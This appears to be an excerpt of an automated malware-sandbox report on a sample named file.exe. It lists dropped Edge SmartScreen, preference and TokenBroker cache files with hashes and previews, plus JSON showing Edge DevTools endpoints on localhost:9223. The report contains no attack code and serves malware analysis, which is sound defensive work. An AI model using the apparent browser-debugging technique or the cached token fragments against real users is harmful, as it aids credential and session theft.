SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.010715172129458
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXARVn:YWLSGTt1o9LuLgfGBPAzkVj/T8lwH
MD5:	24E51D4B2812091567914F300D89DC84
SHA1:	633D40D1F94CCA52669DA9817AD84FE5B6BB338D
SHA-256:	37B654EB8D4A62917D1CA4C1DCF33EA84031BFEAAFC9F9AE8B86A3C0DA3CAB0C
SHA-512:	917134813CCA9F4C53AD0C36AE77D1E45DB46968B7EC4EE294E42892405600AD1F9A7C9F16D544BB0127A6B30DC7C6FFC420D092A1EE9A15AA90B2A67BE49417
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732631639079527}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\be426f37-9411-4a75-ab08-1dac29dc46bf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46049
Entropy (8bit):	6.088610109520845
Encrypted:	false
SSDEEP:	768:EMkbJrT8IeQc5d995su5hDO6vP6OW8tBBICEFTYgIQmxgRCAoaGoup1Xl3jVzXrP:EMk1rT8H199m64IQ9Roahu3VlXr4Q
MD5:	7A7D0CA9B717333909B2EEE43FD7D339
SHA1:	12061C84335CE8BD69BE7B7C5AB6EE28A3E3E2DD
SHA-256:	DBA538E5E929663A8DC130A6E7E6310A1BAF2BD6C40D19A0CE2C0E08F19B2087
SHA-512:	47DAE9ECED99E8FDCA471BB39A375DD67095552DB7C99680BF890379609972CB7A33003B5BC7C88E43474F496489C8044C456E345E76A8730FBBD91D127EFDBA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732530839"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d5730f8d-1a9b-4cd0-861c-3cc5ec94062e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44690
Entropy (8bit):	6.0961767053894365
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBfwushDO6vP6OW8tBBICEFTYgcGoup1Xl3jVzXr4z:z/Ps+wsI7yOE564chu3VlXr4CRo1
MD5:	3901C02C909B49071DAC066F49867041
SHA1:	00B065CFFE3F0C6178641E6E183184388221456C
SHA-256:	EEC5FC6FF615393B7288E644D4F51F2BAE8B27D058577FB47146A1579F57448F
SHA-512:	0A0B5A1FA3399DD1A982D3639C2746275FC4556EB79E05F4BB98510A8D889CCCEECB4B093A854FBD70D64CC67C0FA08CCBB6A1C150EE7A9B77321DADA31BF268
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8473199996960776
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxjxl9Il8uGpfOa80sNmY+fCxE4TVCWVd1rc:mSYWWa80VY+qO4TVCh
MD5:	10EC69B45BAA4AA980B8DA8927994B20
SHA1:	F9C1E16EFB7B14F66851A3D4B5209621BACF973C
SHA-256:	F5FEC11EABE20169BD5F6DBBFE379DDB54538FFD15B8C74FCA3D7542850694F5
SHA-512:	D49F23251ADF95597C8597EC043AB4A8957F747EE2D57FE89D69B39159CC44A6D371A9E42E1EE5CB0AE199F87937F28DAC462DCAD4C755FFA6515610AF3E62F9
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.A.H.6.i.0./.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.P.7.0.6.+.3.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.001302420918219
Encrypted:	false
SSDEEP:	96:nYvo3BG81vI03fa0zqu3pZXbIG/pOu0L98FU:nH3XQ03y0zqYpZXbP/swU
MD5:	FFB923E1402F64EB3ADB08098C186283
SHA1:	6BB1B5E5A6B92731A409E24B064C787A6BF77FF6
SHA-256:	24AF4642904029994E2973B9CAC783B4E5DC898FB03EFD8E0D5A7223A5CEDF41
SHA-512:	33F673985367B5BF99FA78E3D6D8ED5EC7DB2404DE50620A59F94A1970922B8AF938A8B0CB1B6CC5A5CB2F3AEA7DC291B173DC277AE6650A2ECDEAE68D238A34
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".L.n.U.k.0.C.U./.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.P.7.0.6.+.3.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.9034401194081396
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xEvCuxl9Il8uGaWkDygI/+UZd5Z9LBsT88qrAhd/vc:axKYNWoY+UZlw88EAw
MD5:	2D2C8C3B459AD6E0E464AD755A640135
SHA1:	F7A6E678EE70F73E9D3C93C1EF8DEF564B15ED3F
SHA-256:	BFBEC55AB17FBEF679B695B17D54552F039AC031B5E39464E003F1E9CA1FEED4
SHA-512:	FB52C18D3DF67D8AB3201F28A4E86EA86A3406C98E0120434FB226B25CB5FF31D9D4677EEDBC179AEC3038F85C8A4C4F6D5C8F98F383A14040CD2D109A9C9F22
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Z.a.g.l.A.f.d.d.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.P.7.0.6.+.3.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.396076965259817
Encrypted:	false
SSDEEP:	96:6NnCuHCONnC0bCDNnCU9CsNnCJR5dgECJXNnCMCBNnCkDCpNnCwwCGNnCc3Cl:6NRNuNVNeGNyNDANhgNc
MD5:	7250159F37928BC1826A65A93E07E748
SHA1:	012941D0A57327CDBAA82723B34BDD20B35D978E
SHA-256:	8CDC97011639D05BDE2B306923269AB458D7D5CC776500F378C3114EDBCB25F8
SHA-512:	009C6187B9843371261EE109F0EAC03E2E1DC596D3EF6D234860FFAD57B341C98905453F766164A6742A3B25F349CA58D8A6B96F0D2EFDD149AA579AF6A1EB31
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F2C9EE9032A75E9BF1604DBF4783393D",.. "id": "F2C9EE9032A75E9BF1604DBF4783393D",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F2C9EE9032A75E9BF1604DBF4783393D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9EC783CA6F5C0C16E9FC8662F9EAD070",.. "id": "9EC783CA6F5C0C16E9FC8662F9EAD070",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9EC783CA6F5C0C16E9FC8662F9EAD070"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.382787182331119
Encrypted:	false
SSDEEP:	48:SfNaoCT0WTECTmfNaoC0CbfNaoC3r/liaC3rCfNaoCdhkhtli00UrU0U8Cdu1:6NnCRTECiNnC0CzNnC7/oaC7qNnCdhkf
MD5:	503D9DF97000597DE883FBCCF82DD92A
SHA1:	DED947A3ABA858C0074243DAB7C8FFF792F861D8
SHA-256:	3D66EA734014D1C21BF848BF2105FB4F3940271248F634DFB493CAE6EE305E52
SHA-512:	2915E67B8AA2BDEA5D42ECD0D738A9040FAB1ADF82D5BA1DD3BDEBF1F7ACBCD9F7A53009E89773365E48043066A3DF43A8CE7C8BF1488E46F3E14289C21AEECC
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C4D0BBEB60FB8A1BBE0133C0772ED5A5",.. "id": "C4D0BBEB60FB8A1BBE0133C0772ED5A5",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C4D0BBEB60FB8A1BBE0133C0772ED5A5"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/060517B78CFABB96DAC3C881EB0CBA81",.. "id": "060517B78CFABB96DAC3C881EB0CBA81",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/060517B78CFABB96DAC3C881EB0CBA81"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Temp\014214e0-ee21-4ca4-aa91-6e8a2cfec14b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\0fa673b3-bc62-41fb-aeab-60124d1890de.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
Category:	dropped
Size (bytes):	76321
Entropy (8bit):	7.996057445951542
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
MD5:	D7A1AC56ED4F4D17DD0524C88892C56D
SHA1:	4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
SHA-256:	0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
SHA-512:	31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
Malicious:	false
